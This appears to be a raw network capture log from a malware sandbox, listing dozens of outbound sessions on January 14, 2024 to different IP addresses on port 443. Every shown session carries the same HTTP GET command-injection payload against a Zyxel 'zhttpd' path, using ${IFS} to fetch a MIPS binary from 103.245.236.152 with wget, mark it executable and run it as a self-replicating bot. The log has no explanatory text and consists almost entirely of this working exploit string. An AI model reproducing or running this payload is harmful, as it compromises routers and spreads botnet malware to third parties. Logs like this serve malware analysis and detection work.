                                        Jan 14, 2024 16:18:37.281090021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2290192.168.2.1355866130.19.207.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281173944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2291192.168.2.1344264190.223.17.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281214952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2292192.168.2.134497252.9.39.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281261921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2293192.168.2.134350437.17.76.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281326056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2294192.168.2.1344982216.169.114.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281382084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2295192.168.2.133364292.244.238.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281469107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2296192.168.2.134079065.200.41.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281523943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2297192.168.2.1349090189.79.66.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281577110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2298192.168.2.1350308140.19.230.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281632900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2299192.168.2.1359392157.225.163.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281687975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2300192.168.2.1336960193.204.214.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281757116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2301192.168.2.1341824202.234.246.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281821012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2302192.168.2.1357532169.169.20.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281867027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2303192.168.2.134622035.252.107.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.281944036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2304192.168.2.1355942114.212.249.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282018900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2305192.168.2.1353578193.190.241.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282074928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2306192.168.2.1347898132.220.2.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282130003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2307192.168.2.1349824126.60.77.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282187939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2308192.168.2.1351906126.191.94.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282227039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2309192.168.2.1345420144.58.128.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282293081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2310192.168.2.1335598212.40.228.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282356977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2311192.168.2.1347366145.151.111.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282402992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2312192.168.2.134731860.163.200.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282485008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2313192.168.2.1341358124.104.185.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282510996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2314192.168.2.1340220143.156.36.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282569885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2315192.168.2.135012049.229.174.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282622099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2316192.168.2.1347248110.48.92.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282711983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2317192.168.2.1333590104.58.30.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282769918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2318192.168.2.133638041.33.140.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282836914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2319192.168.2.1351702181.71.120.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282888889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2320192.168.2.1337748141.219.71.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282953024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2321192.168.2.134052843.252.78.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.282985926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2322192.168.2.1348764146.64.179.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283056021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2323192.168.2.1360668115.162.237.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283099890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2324192.168.2.1357318133.100.231.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283165932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2325192.168.2.13412542.52.167.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283225060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2326192.168.2.134983299.110.28.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283291101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2327192.168.2.1338538191.243.150.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283366919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2328192.168.2.1356472182.99.30.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283406973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2329192.168.2.1343432221.135.223.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283457994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2330192.168.2.1355054133.125.185.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283521891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2331192.168.2.1360154209.172.68.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283579111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2332192.168.2.135087860.223.232.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283631086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2333192.168.2.13395285.119.95.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283682108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2334192.168.2.134662496.67.158.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283719063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2335192.168.2.1335636202.164.242.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283787012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2336192.168.2.133659486.122.4.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283807039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2337192.168.2.133639469.252.218.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283848047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2338192.168.2.134045250.133.58.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283976078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2339192.168.2.135317082.148.188.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.283976078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2340192.168.2.1336614111.196.196.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284008980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2341192.168.2.1339324117.163.167.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284070015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2342192.168.2.133396250.9.23.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284125090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2343192.168.2.133472276.21.61.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284166098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2344192.168.2.1332948181.35.101.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284254074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2345192.168.2.1354840121.209.57.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284327030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2346192.168.2.133589683.251.185.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284362078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2347192.168.2.1339598121.59.209.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284423113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2348192.168.2.1350994223.15.188.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284468889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2349192.168.2.133331874.195.195.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284526110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2350192.168.2.133745453.12.76.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284548044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2351192.168.2.135371495.23.55.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284614086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2352192.168.2.133788092.98.207.238443
                                        TimestampBytes transferredDirectionData
